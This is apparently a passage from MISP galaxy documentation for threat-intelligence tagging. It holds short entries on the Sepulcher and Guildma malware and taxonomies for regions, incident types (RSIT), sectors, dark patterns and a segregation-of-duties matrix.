Researchers discovered the new malware being distributed over the past six months through two separate campaigns. The first, in March, targeted European diplomatic and legislative bodies, non-profit policy research organizations and global organizations dealing with economic affairs. The second, in July, targeted Tibetan dissidents. They tied the campaigns to APT group TA413, which researchers say has been associated with Chinese state interests and is known for targeting the Tibetan community.

“Based on the use of publicly known sender addresses associated with Tibetan dissident targeting and the delivery of Sepulcher malware payloads, [we] have attributed both campaigns to the APT actor TA413,” said Proofpoint researchers in a Wednesday analysis. “The usage of publicly known Tibetan-themed sender accounts to deliver Sepulcher malware demonstrates a short-term realignment of TA413’s targets of interest.”

The tag is: misp-galaxy:rat="Sepulcher"

Table 5853. Table References

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<tbody>
<tr>
<td><a href="https://www.enigmasoftware.fr/logicielmalveillantsepulcher-supprimer/">https://www.enigmasoftware.fr/logicielmalveillantsepulcher-supprimer/</a></td>
</tr>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sepulcher">https://malpedia.caad.fkie.fraunhofer.de/details/win.sepulcher</a></td>
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</table>

Guildma

The campaign spreads via phishing emails posing as invoices, tax reports, invitations and similar types of messages containing a ZIP archive attachment with a malicious LNK file. When a user opens the malicious LNK file, it abuses the Windows Management Instrumentation Command-line tool and silently downloads a malicious XSL file. The XSL file downloads all of Guildma’s modules and executes a first stage loader, which loads the rest of the modules. The malware is then active and waits for commands from the C&C server and/or specific user interactions, such as opening a webpage of one of the targeted banks.

The tag is: misp-galaxy:rat="Guildma"

Guildma is also known as:

Table 5854. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://www.securityweek.com/guildma-malware-expands-targets-beyond-brazil">https://www.securityweek.com/guildma-malware-expands-targets-beyond-brazil</a></td>
</tr>
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</table>
Regions UN M49

Regions based on UN M49.

Regions UN M49 is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.

**authors**
Unknown

**001 - World**
The tag is: `misp-galaxy:region="001 - World"`

**002 - Africa**
The tag is: `misp-galaxy:region="002 - Africa"`

**019 - Americas**
The tag is: `misp-galaxy:region="019 - Americas"`

**142 - Asia**
The tag is: `misp-galaxy:region="142 - Asia"`

**150 - Europe**
The tag is: `misp-galaxy:region="150 - Europe"`

**009 - Oceania**
The tag is: `misp-galaxy:region="009 - Oceania"`

**015 - Northern Africa**
The tag is: `misp-galaxy:region="015 - Northern Africa"`

**202 - Sub-Saharan Africa**
The tag is: `misp-galaxy:region="202 - Sub-Saharan Africa"`
419 - Latin America and the Caribbean
The tag is: misp-galaxy:region="419 - Latin America and the Caribbean"

021 - Northern America
The tag is: misp-galaxy:region="021 - Northern America"

143 - Central Asia
The tag is: misp-galaxy:region="143 - Central Asia"

030 - Eastern Asia
The tag is: misp-galaxy:region="030 - Eastern Asia"

035 - South-eastern Asia
The tag is: misp-galaxy:region="035 - South-eastern Asia"

034 - Southern Asia
The tag is: misp-galaxy:region="034 - Southern Asia"

145 - Western Asia
The tag is: misp-galaxy:region="145 - Western Asia"

151 - Eastern Europe
The tag is: misp-galaxy:region="151 - Eastern Europe"

154 - Northern Europe
The tag is: misp-galaxy:region="154 - Northern Europe"

039 - Southern Europe
The tag is: misp-galaxy:region="039 - Southern Europe"

155 - Western Europe
The tag is: misp-galaxy:region="155 - Western Europe"
053 - Australia and New Zealand
The tag is: misp-galaxy:region="053 - Australia and New Zealand"

054 - Melanesia
The tag is: misp-galaxy:region="054 - Melanesia"

057 - Micronesia
The tag is: misp-galaxy:region="057 - Micronesia"

061 - Polynesia
The tag is: misp-galaxy:region="061 - Polynesia"

014 - Eastern Africa
The tag is: misp-galaxy:region="014 - Eastern Africa"

017 - Middle Africa
The tag is: misp-galaxy:region="017 - Middle Africa"

018 - Southern Africa
The tag is: misp-galaxy:region="018 - Southern Africa"

011 - Western Africa
The tag is: misp-galaxy:region="011 - Western Africa"

029 - Caribbean
The tag is: misp-galaxy:region="029 - Caribbean"

013 - Central America
The tag is: misp-galaxy:region="013 - Central America"

005 - South America
The tag is: misp-galaxy:region="005 - South America"
830 - Channel Islands

The tag is: `misp-galaxy:region="830 - Channel Islands"`

rsit

rsit.

rsit is a cluster galaxy available in JSON format at [this location](#) The JSON format can be freely reused in your application or automatically enabled in MISP.

authors

Koen Van Impe

Abusive Content:Spam

Or 'Unsolicited Bulk Email', this means that the recipient has not granted verifiable permission for the message to be sent and that the message is sent as part of a larger collection of messages, all having a functionally comparable content. This IOC refers to resources, which make up a SPAM infrastructure, be it a harvesters like address verification, URLs in spam e-mails etc.

The tag is: `misp-galaxy:rsit="Abusive Content:Spam"`

Abusive Content:Spam has relationships with:

- similar: `misp-galaxy:mitre-attack-pattern="Phishing - T1566"` with estimative-language:likelihood-probability="likely"

Abusive Content:Harmful Speech

Discretization or discrimination of somebody, e.g. cyber stalking, racism or threats against one or more individuals.

The tag is: `misp-galaxy:rsit="Abusive Content:Harmful Speech"`

Abusive Content:(Child) Sexual Exploitation/Sexual/Violent Content

Child Sexual Exploitation (CSE), Sexual content, glorification of violence, etc.

The tag is: `misp-galaxy:rsit="Abusive Content:(Child) Sexual Exploitation/Sexual/Violent Content"`

Abusive Content:(Child) Sexual Exploitation/Sexual/Violent Content has relationships with:

- similar: `misp-galaxy:mitre-attack-pattern="Phishing - T1566"` with estimative-language:likelihood-probability="likely"
Malicious Code: Infected System

System infected with malware, e.g. PC, smartphone or server infected with a rootkit. Most often this refers to a connection to a sinkholed C2 server.

The tag is: `misp-galaxy:rsit="Malicious Code:Infected System"`

Malicious Code: C2 Server

Command-and-control server contacted by malware on infected systems.

The tag is: `misp-galaxy:rsit="Malicious Code:C2 Server"`

Malicious Code: C2 Server has relationships with:

- similar: `misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041"` with estimative-language:likelihood-probability="likely"

Malicious Code: Malware Distribution

URI used for malware distribution, e.g. a download URL included in fake invoice malware spam or exploit-kits (on websites).

The tag is: `misp-galaxy:rsit="Malicious Code:Malware Distribution"`

Malicious Code: Malware Configuration

URI hosting a malware configuration file, e.g. web-injects for a banking trojan.

The tag is: `misp-galaxy:rsit="Malicious Code:Malware Configuration"`

Information Gathering: Scanning

Attacks that send requests to a system to discover weaknesses. This also includes testing processes to gather information on hosts, services and accounts. Examples: fingerd, DNS querying, ICMP, SMTP (EXPN, RCPT, ...), port scanning.

The tag is: `misp-galaxy:rsit="Information Gathering:Scanning"`

Information Gathering: Scanning has relationships with:

- similar: `misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:mitre-attack-pattern="Active Scanning - T1595"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:mitre-attack-pattern="Vulnerability Scanning - T1595.002"` with estimative-language:likelihood-probability="likely"
Information Gathering: Sniffing

Observing and recording of network traffic (wiretapping).

The tag is: `misp-galaxy:rsit="Information Gathering:Sniffing"`

Information Gathering: Sniffing has relationships with:

- similar: `misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:mitre-attack-pattern="Man-in-the-Middle - T1557"` with estimative-language:likelihood-probability="likely"

Information Gathering: Social Engineering

Gathering information from a human being in a non-technical way (e.g. lies, tricks, bribes, or threats).

The tag is: `misp-galaxy:rsit="Information Gathering:Social Engineering"`

Intrusion Attempts: Exploitation of known Vulnerabilities

An attempt to compromise a system or to disrupt any service by exploiting vulnerabilities with a standardised identifier such as CVE name (e.g. buffer overflow, backdoor, cross site scripting, etc.)

The tag is: `misp-galaxy:rsit="Intrusion Attempts:Exploitation of known Vulnerabilities"`

Intrusion Attempts: Exploitation of known Vulnerabilities has relationships with:

- similar: `misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210"` with estimative-language:likelihood-probability="likely"

Intrusion Attempts: Login attempts

Multiple login attempts (Guessing / cracking of passwords, brute force). This IOC refers to a resource, which has been observed to perform brute-force attacks over a given application protocol.

The tag is: `misp-galaxy:rsit="Intrusion Attempts:Login attempts"`
Intrusion Attempts: Login attempts has relationships with:

- similar: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:mitre-attack-pattern="Password Cracking - T1110.002" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:mitre-attack-pattern="Credential Stuffing - T1110.004" with estimative-language:likelihood-probability="likely"

**Intrusion Attempts: New attack signature**

An attack using an unknown exploit.

The tag is: misp-galaxy:rsit="Intrusion Attempts: New attack signature"

**Intrusions: Privileged Account Compromise**

Compromise of a system where the attacker gained administrative privileges.

The tag is: misp-galaxy:rsit="Intrusions: Privileged Account Compromise"

Intrusions: Privileged Account Compromise has relationships with:

- similar: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="likely"

**Intrusions: Unprivileged Account Compromise**

Compromise of a system using an unprivileged (user/service) account.

The tag is: misp-galaxy:rsit="Intrusions: Unprivileged Account Compromise"

Intrusions: Unprivileged Account Compromise has relationships with:

- similar: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="likely"

**Intrusions: Application Compromise**

Compromise of an application by exploiting (un-)known software vulnerabilities, e.g. SQL injection.

The tag is: misp-galaxy:rsit="Intrusions: Application Compromise"
Intrusions: Application Compromise has relationships with:

- similar: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="likely"

**Intrusions: System Compromise**

Compromise of a system, e.g. unauthorised logins or commands. This includes compromising attempts on honeypot systems.

The tag is: *misp-galaxy:rsit="Intrusions: System Compromise"*

**Intrusions: Burglary**

Physical intrusion, e.g. into corporate building or data-centre.

The tag is: *misp-galaxy:rsit="Intrusions: Burglary"*

**Availability: Denial of Service**

Denial of Service attack, e.g. sending specially crafted requests to a web application which causes the application to crash or slow down.

The tag is: *misp-galaxy:rsit="Availability: Denial of Service"*

Availability: Denial of Service has relationships with:

- similar: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498" with estimative-language:likelihood-probability="likely"

**Availability: Distributed Denial of Service**

Distributed Denial of Service attack, e.g. SYN-Flood or UDP-based reflection/amplification attacks.

The tag is: *misp-galaxy:rsit="Availability: Distributed Denial of Service"*

Availability: Distributed Denial of Service has relationships with:

- similar: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498" with estimative-language:likelihood-probability="likely"

**Availability: Misconfiguration**

Software misconfiguration resulting in service availability issues, e.g. DNS server with outdated DNSSEC Root Zone KSK.

The tag is: *misp-galaxy:rsit="Availability: Misconfiguration"*
Availability: Sabotage
Physical sabotage, e.g. cutting wires or malicious arson.
The tag is: misp-galaxy:rsit="Availability:Sabotage"

Availability: Outage
Outage caused e.g. by air condition failure or natural disaster.
The tag is: misp-galaxy:rsit="Availability:Outage"

Information Content Security: Unauthorised access to information
Unauthorised access to information, e.g. by abusing stolen login credentials for a system or application, intercepting traffic or gaining access to physical documents.
The tag is: misp-galaxy:rsit="Information Content Security:Unauthorised access to information"

Information Content Security: Unauthorised modification of information
Unauthorised modification of information, e.g. by an attacker abusing stolen login credentials for a system or application or a ransomware encrypting data. Also includes defacements.
The tag is: misp-galaxy:rsit="Information Content Security:Unauthorised modification of information"

Information Content Security: Unauthorised modification of information has relationships with:
- similar: misp-galaxy:mitre-attack-pattern="Data Manipulation - T1565" with estimative-language:likelihood-probability="likely"

Information Content Security: Data Loss
Loss of data, e.g. caused by harddisk failure or physical theft.
The tag is: misp-galaxy:rsit="Information Content Security:Data Loss"

Information Content Security: Leak of confidential information
Leaked confidential information like credentials or personal data.
The tag is: misp-galaxy:rsit="Information Content Security:Leak of confidential information"
Fraud: Unauthorised use of resources

Using resources for unauthorised purposes including profit-making ventures, e.g. the use of e-mail to participate in illegal profit chain letters or pyramid schemes.

The tag is: *misp-galaxy:rsit="Fraud: Unauthorised use of resources"*

Fraud: Copyright

Offering or installing copies of unlicensed commercial software or other copyright protected materials (Warez).

The tag is: *misp-galaxy:rsit="Fraud: Copyright"*

Fraud: Masquerade

Type of attack in which one entity illegitimately impersonates the identity of another in order to benefit from it.

The tag is: *misp-galaxy:rsit="Fraud: Masquerade"*

Fraud: Phishing

Masquerading as another entity in order to persuade the user to reveal private credentials. This IOC most often refers to a URL, which is used to phish user credentials.

The tag is: *misp-galaxy:rsit="Fraud: Phishing"*

Fraud: Phishing has relationships with:

- similar: *misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="likely"

Vulnerable: Weak crypto

Publicly accessible services offering weak crypto, e.g. web servers susceptible to POODLE/FREAK attacks.

The tag is: *misp-galaxy:rsit="Vulnerable: Weak crypto"*

Vulnerable: DDoS amplifier

Publicly accessible services that can be abused for conducting DDoS reflection/amplification attacks, e.g. DNS open-resolvers or NTP servers with monlist enabled.

The tag is: *misp-galaxy:rsit="Vulnerable: DDoS amplifier"*

Vulnerable: DDoS amplifier has relationships with:
• similar: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498" with estimative-language:likelihood-probability="likely"

**Vulnerable: Potentially unwanted accessible services**

Potentially unwanted publicly accessible services, e.g. Telnet, RDP or VNC.

The tag is: misp-galaxy:rsit="Vulnerable: Potentially unwanted accessible services"

**Vulnerable: Information disclosure**

Publicly accessible services potentially disclosing sensitive information, e.g. SNMP or Redis.

The tag is: misp-galaxy:rsit="Vulnerable: Information disclosure"

**Vulnerable: Vulnerable system**

A system which is vulnerable to certain attacks. Example: misconfigured client proxy settings (example: WPAD), outdated operating system version, XSS vulnerabilities, etc.

The tag is: misp-galaxy:rsit="Vulnerable: Vulnerable system"

**Other: Uncategorised**

All incidents which don't fit in one of the given categories should be put into this class or the incident is not categorised.

The tag is: misp-galaxy:rsit="Other: Uncategorised"

**Other: Undetermined**

The categorisation of the incident is unknown/undetermined.

The tag is: misp-galaxy:rsit="Other: Undetermined"

**Test: Test**

Meant for testing.

The tag is: misp-galaxy:rsit="Test: Test"

**Sector**

Activity sectors.
Sector is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.

**authors**
Various

**Unknown**
The tag is: `misp-galaxy:sector="Unknown"`

**Other**
The tag is: `misp-galaxy:sector="Other"`

**Academia - University**
The tag is: `misp-galaxy:sector="Academia - University"`

**Activists**
The tag is: `misp-galaxy:sector="Activists"`

**Aerospace**
The tag is: `misp-galaxy:sector="Aerospace"`

**Agriculture**
The tag is: `misp-galaxy:sector="Agriculture"`

**Arts**
The tag is: `misp-galaxy:sector="Arts"`

**Bank**
The tag is: `misp-galaxy:sector="Bank"`

**Chemical**
The tag is: `misp-galaxy:sector="Chemical"`
Citizens
The tag is: misp-galaxy:sector="Citizens"

Civil Aviation
The tag is: misp-galaxy:sector="Civil Aviation"

Country
The tag is: misp-galaxy:sector="Country"

Culture
The tag is: misp-galaxy:sector="Culture"

Data Broker
The tag is: misp-galaxy:sector="Data Broker"

Defense
The tag is: misp-galaxy:sector="Defense"

Development
The tag is: misp-galaxy:sector="Development"

Diplomacy
The tag is: misp-galaxy:sector="Diplomacy"

Education
The tag is: misp-galaxy:sector="Education"

Electric
The tag is: misp-galaxy:sector="Electric"

Electronic
The tag is: misp-galaxy:sector="Electronic"
Employment
The tag is: misp-galaxy:sector="Employment"

Energy
The tag is: misp-galaxy:sector="Energy"

Entertainment
The tag is: misp-galaxy:sector="Entertainment"

Environment
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Finance
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Food
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Game
The tag is: misp-galaxy:sector="Game"

Gas
The tag is: misp-galaxy:sector="Gas"

Government, Administration
The tag is: misp-galaxy:sector="Government, Administration"

Health
The tag is: misp-galaxy:sector="Health"

Higher education
The tag is: misp-galaxy:sector="Higher education"
Hotels
The tag is: misp-galaxy:sector="Hotels"

Infrastructure
The tag is: misp-galaxy:sector="Infrastructure"

Intelligence
The tag is: misp-galaxy:sector="Intelligence"

IT
The tag is: misp-galaxy:sector="IT"

IT - Hacker
The tag is: misp-galaxy:sector="IT - Hacker"

IT - ISP
The tag is: misp-galaxy:sector="IT - ISP"

IT - Security
The tag is: misp-galaxy:sector="IT - Security"

Justice
The tag is: misp-galaxy:sector="Justice"

Manufacturing
The tag is: misp-galaxy:sector="Manufacturing"

Maritime
The tag is: misp-galaxy:sector="Maritime"

Military
The tag is: misp-galaxy:sector="Military"
Multi-sector
The tag is: `misp-galaxy:sector="Multi-sector"`

News - Media
The tag is: `misp-galaxy:sector="News - Media"`

NGO
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Oil
The tag is: `misp-galaxy:sector="Oil"`

Payment
The tag is: `misp-galaxy:sector="Payment"`

Pharmacy
The tag is: `misp-galaxy:sector="Pharmacy"`

Police - Law enforcement
The tag is: `misp-galaxy:sector="Police - Law enforcement"`

Research - Innovation
The tag is: `misp-galaxy:sector="Research - Innovation"`

Satellite navigation
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Security systems
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Social networks
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Space
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Steel
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Telecoms
The tag is: misp-galaxy:sector="Telecoms"

Think Tanks
The tag is: misp-galaxy:sector="Think Tanks"

Trade
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Transport
The tag is: misp-galaxy:sector="Transport"

Travel
The tag is: misp-galaxy:sector="Travel"

Turbine
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Tourism
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Life science
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Biomedical
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High tech
The tag is: misp-galaxy:sector="High tech"

Opposition
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Political party
The tag is: misp-galaxy:sector="Political party"

Hospitality
The tag is: misp-galaxy:sector="Hospitality"

Automotive
The tag is: misp-galaxy:sector="Automotive"

Metal
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Railway
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Water
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Smart meter
The tag is: misp-galaxy:sector="Smart meter"

Retail
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Technology
The tag is: misp-galaxy:sector="Technology"
engineering

The tag is: misp-galaxy:sector="engineering"

Mining

The tag is: misp-galaxy:sector="Mining"

Sport

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Restaurant

The tag is: misp-galaxy:sector="Restaurant"

Semi-conductors

The tag is: misp-galaxy:sector="Semi-conductors"

Insurance

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Legal

The tag is: misp-galaxy:sector="Legal"

Shipping

The tag is: misp-galaxy:sector="Shipping"

Logistic

The tag is: misp-galaxy:sector="Logistic"

Construction

The tag is: misp-galaxy:sector="Construction"

Industrial

The tag is: misp-galaxy:sector="Industrial"
Communication equipment
The tag is: misp-galaxy:sector="Communication equipment"

Security Service
The tag is: misp-galaxy:sector="Security Service"

Tax firm
The tag is: misp-galaxy:sector="Tax firm"

Television broadcast
The tag is: misp-galaxy:sector="Television broadcast"

Separatists
The tag is: misp-galaxy:sector="Separatists"

Dissidents
The tag is: misp-galaxy:sector="Dissidents"

Digital services
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Digital infrastructure
The tag is: misp-galaxy:sector="Digital infrastructure"

Security actors
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eCommerce
The tag is: misp-galaxy:sector="eCommerce"

Islamic forums
The tag is: misp-galaxy:sector="Islamic forums"
Journalist
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Streaming service
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Publishing industry
The tag is: mip-galaxy:sector="Publishing industry"

Islamic organisation
The tag is: mip-galaxy:sector="Islamic organisation"

Casino
The tag is: mip-galaxy:sector="Casino"

Consulting
The tag is: mip-galaxy:sector="Consulting"

Online marketplace
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DNS service provider
The tag is: mip-galaxy:sector="DNS service provider"

Veterinary
The tag is: mip-galaxy:sector="Veterinary"

Marketing
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Video Sharing
The tag is: mip-galaxy:sector="Video Sharing"
Advertising
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Investment
The tag is: `misp-galaxy:sector="Investment"`

Accounting
The tag is: `misp-galaxy:sector="Accounting"`

Programming
The tag is: `misp-galaxy:sector="Programming"`

Managed Services Provider
The tag is: `misp-galaxy:sector="Managed Services Provider"`

Lawyers
The tag is: `misp-galaxy:sector="Lawyers"`

Civil society
The tag is: `misp-galaxy:sector="Civil society"`

Petrochemical
The tag is: `misp-galaxy:sector="Petrochemical"`

Immigration
The tag is: `misp-galaxy:sector="Immigration"`

Dark Patterns
Dark Patterns are user interface that tricks users into making decisions that benefit the interface’s holder to the expense of the user..

Dark Patterns is a cluster galaxy available in JSON format at [this location](#) The JSON format can be freely reused in your application or automatically enabled in MISP.
Nagging
Repeated requests to do something the firms prefer
The tag is: misp-galaxy:social-dark-patterns="Nagging"

Activity Messages
Misleading notice about other consumers' actions
The tag is: misp-galaxy:social-dark-patterns="Activity Messages"

Testimonials
Misleading statements from customers
The tag is: misp-galaxy:social-dark-patterns="Testimonials"

Roach Motel
Asymmetry between signing up and canceling
The tag is: misp-galaxy:social-dark-patterns="Roach Motel"
Price Comparison Prevention

Frustrates comparison shopping

The tag is: `misp-galaxy:social-dark-patterns="Price Comparison Prevention"`

Table 5859. Table References

Links

- https://www.darkpatterns.org/
- https://www.darkpatterns.org/
- https://dl.acm.org/citation.cfm?id=3174108

Intermediate Currency

Purchases in virtual currency to obscure cost

The tag is: `misp-galaxy:social-dark-patterns="Intermediate Currency"`

Table 5860. Table References

Links

- https://www.darkpatterns.org/

Sneak into Basket

Item consumer did not add is in cart

The tag is: `misp-galaxy:social-dark-patterns="Sneak into Basket"`

Table 5861. Table References

Links

- https://www.darkpatterns.org/
- https://dl.acm.org/citation.cfm?id=3174108
Hidden Costs

Costs obscured / disclosed late in transaction

The tag is: *misp-galaxy:social-dark-patterns*="Hidden Costs"

**Table 5862. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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</table>
| [https://www.darkpatterns.org/](https://www.darkpatterns.org/)
| [https://dl.acm.org/citation.cfm?id=3174108](https://dl.acm.org/citation.cfm?id=3174108)

Hidden subscription / forced continuity

Unanticipated / undesired automatic renewal

The tag is: *misp-galaxy:social-dark-patterns*="Hidden subscription / forced continuity"

**Table 5863. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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| [https://www.darkpatterns.org/](https://www.darkpatterns.org/)
| [https://dl.acm.org/citation.cfm?id=3174108](https://dl.acm.org/citation.cfm?id=3174108)

Bait & Switch

Customer sold something other than what’s originally advertised

The tag is: *misp-galaxy:social-dark-patterns*="Bait & Switch"

**Table 5864. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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| [https://dl.acm.org/citation.cfm?id=3174108](https://dl.acm.org/citation.cfm?id=3174108)

Hidden information / aesthetic manipulation / false hierarchy

Important information visually obscured
The tag is: *misp-galaxy:social-dark-patterns*="Hidden information / aesthetic manipulation / false hierarchy"

**Table 5865. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
</table>

**Preselection**

Firm-friendly default is preselected

The tag is: *misp-galaxy:social-dark-patterns*="Preselection"

**Table 5866. Table References**

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://petsymposium.org/2016/files/papers/Tales_from_the_Dark_SidePrivacy_Dark_Strategies_and_Privacy_Dark_Patterns.pdf">https://petsymposium.org/2016/files/papers/Tales_from_the_Dark_SidePrivacy_Dark_Strategies_and_Privacy_Dark_Patterns.pdf</a></td>
</tr>
</tbody>
</table>

**Toying with emotion**

Emotionally manipulative framing

The tag is: *misp-galaxy:social-dark-patterns*="Toying with emotion"

**Table 5867. Table References**

<table>
<thead>
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<th>Links</th>
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</table>

**Trick questions**

Intentional or obvious ambiguity

The tag is: *misp-galaxy:social-dark-patterns*="Trick questions"

**Table 5868. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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</tbody>
</table>
Disguised Ad

Consumer induced to click on something that isn't apparent ad

The tag is: `misp-galaxy:social-dark-patterns="Disguised Ad"`

Table 5869. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://dl.acm.org/citation.cfm?id=3174108">https://dl.acm.org/citation.cfm?id=3174108</a></td>
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<tr>
<td><a href="https://www.darkpatterns.org/types-of-dark-pattern">https://www.darkpatterns.org/types-of-dark-pattern</a></td>
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</tbody>
</table>

Confirmshaming

Choice framed in way that seems dishonest / stupid

The tag is: `misp-galaxy:social-dark-patterns="Confirmshaming"`

Table 5870. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://www.darkpatterns.org/types-of-dark-pattern">https://www.darkpatterns.org/types-of-dark-pattern</a></td>
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</tbody>
</table>

Forced Registration

Consumer tricked into thinking registration necessary

The tag is: `misp-galaxy:social-dark-patterns="Forced Registration"`

Table 5871. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://petsymposium.org/2016/files/papers/Tales_from_the_Dark_SidePrivacy_Dark_Strategies_and_Privacy_Dark_Patterns.pdf">https://petsymposium.org/2016/files/papers/Tales_from_the_Dark_SidePrivacy_Dark_Strategies_and_Privacy_Dark_Patterns.pdf</a></td>
</tr>
</tbody>
</table>
Low stock / high-demand message

Consumer falsely informed of limited quantities

The tag is: misp-galaxy:social-dark-patterns="Low stock / high-demand message"

Table 5872. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
</table>

Countdown timer / Limited time message

Opportunity ends soon with blatant false visual cue

The tag is: misp-galaxy:social-dark-patterns="Countdown timer / Limited time message"

Table 5873. Table References

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<thead>
<tr>
<th>Links</th>
</tr>
</thead>
</table>

SoD Matrix

SOD Matrix.

SoD Matrix is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.

authors

Koen Van Impe

Delivering training - CSIRT - [R]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - CSIRT - [R]"

Delivering training - CSIRT - [C]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - CSIRT - [C]"
Delivering training - CSIRT - [I]
Problem-solving and critical thinking skills
The tag is: misp-galaxy:sod-matrix="Delivering training - CSIRT - [I]"

Delivering training - CSIRT - [S]
Problem-solving and critical thinking skills
The tag is: misp-galaxy:sod-matrix="Delivering training - CSIRT - [S]"

Delivering training - LEA - [R]
Problem-solving and critical thinking skills
The tag is: misp-galaxy:sod-matrix="Delivering training - LEA - [R]"

Delivering training - LEA - [C]
Problem-solving and critical thinking skills
The tag is: misp-galaxy:sod-matrix="Delivering training - LEA - [C]"

Delivering training - LEA - [I]
Problem-solving and critical thinking skills
The tag is: misp-galaxy:sod-matrix="Delivering training - LEA - [I]"

Delivering training - LEA - [S]
Problem-solving and critical thinking skills
The tag is: misp-galaxy:sod-matrix="Delivering training - LEA - [S]"

Delivering training - Judiciary - [R]
Problem-solving and critical thinking skills
The tag is: misp-galaxy:sod-matrix="Delivering training - Judiciary - [R]"

Delivering training - Judiciary - [C]
Problem-solving and critical thinking skills
The tag is: misp-galaxy:sod-matrix="Delivering training - Judiciary - [C]"
Delivering training - Judiciary - [I]
Problem-solving and critical thinking skills
The tag is: `misp-galaxy:sod-matrix="Delivering training - Judiciary - [I]"

Delivering training - Judiciary - [S]
Problem-solving and critical thinking skills
The tag is: `misp-galaxy:sod-matrix="Delivering training - Judiciary - [S]"

Delivering training - Prosecutors - [R]
Problem-solving and critical thinking skills
The tag is: `misp-galaxy:sod-matrix="Delivering training - Prosecutors - [R]"

Delivering training - Prosecutors - [C]
Problem-solving and critical thinking skills
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Delivering training - Prosecutors - [I]
Problem-solving and critical thinking skills
The tag is: `misp-galaxy:sod-matrix="Delivering training - Prosecutors - [I]"

Delivering training - Prosecutors - [S]
Problem-solving and critical thinking skills
The tag is: `misp-galaxy:sod-matrix="Delivering training - Prosecutors - [S]"

Participating in training - CSIRT - [R]
Problem-solving and critical thinking skills
The tag is: `misp-galaxy:sod-matrix="Participating in training - CSIRT - [R]"

Participating in training - CSIRT - [C]
Problem-solving and critical thinking skills
The tag is: `misp-galaxy:sod-matrix="Participating in training - CSIRT - [C]"
Participating in training - CSIRT - [I]
Problem-solving and critical thinking skills
The tag is: misp-galaxy:sod-matrix="Participating in training - CSIRT - [I]"

Participating in training - CSIRT - [S]
Problem-solving and critical thinking skills
The tag is: misp-galaxy:sod-matrix="Participating in training - CSIRT - [S]"

Participating in training - LEA - [R]
Problem-solving and critical thinking skills
The tag is: misp-galaxy:sod-matrix="Participating in training - LEA - [R]"

Participating in training - LEA - [C]
Problem-solving and critical thinking skills
The tag is: misp-galaxy:sod-matrix="Participating in training - LEA - [C]"

Participating in training - LEA - [I]
Problem-solving and critical thinking skills
The tag is: misp-galaxy:sod-matrix="Participating in training - LEA - [I]"

Participating in training - LEA - [S]
Problem-solving and critical thinking skills
The tag is: misp-galaxy:sod-matrix="Participating in training - LEA - [S]"

Participating in training - Judiciary - [R]
Problem-solving and critical thinking skills
The tag is: misp-galaxy:sod-matrix="Participating in training - Judiciary - [R]"

Participating in training - Judiciary - [C]
Problem-solving and critical thinking skills
The tag is: misp-galaxy:sod-matrix="Participating in training - Judiciary - [C]"
Participating in training - Judiciary - [I]
Problem-solving and critical thinking skills
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Participating in training - Judiciary - [S]
Problem-solving and critical thinking skills
The tag is: misp-galaxy:sod-matrix="Participating in training - Judiciary - [S]"

Participating in training - Prosecutors - [R]
Problem-solving and critical thinking skills
The tag is: misp-galaxy:sod-matrix="Participating in training - Prosecutors - [R]"

Participating in training - Prosecutors - [C]
Problem-solving and critical thinking skills
The tag is: misp-galaxy:sod-matrix="Participating in training - Prosecutors - [C]"

Participating in training - Prosecutors - [I]
Problem-solving and critical thinking skills
The tag is: misp-galaxy:sod-matrix="Participating in training - Prosecutors - [I]"

Participating in training - Prosecutors - [S]
Problem-solving and critical thinking skills
The tag is: misp-galaxy:sod-matrix="Participating in training - Prosecutors - [S]"

Collecting cyber threat intelligence - CSIRT - [R]
Knowledge of cyber threat intelligence landscape
The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - CSIRT - [R]"

Collecting cyber threat intelligence - CSIRT - [C]
Knowledge of cyber threat intelligence landscape
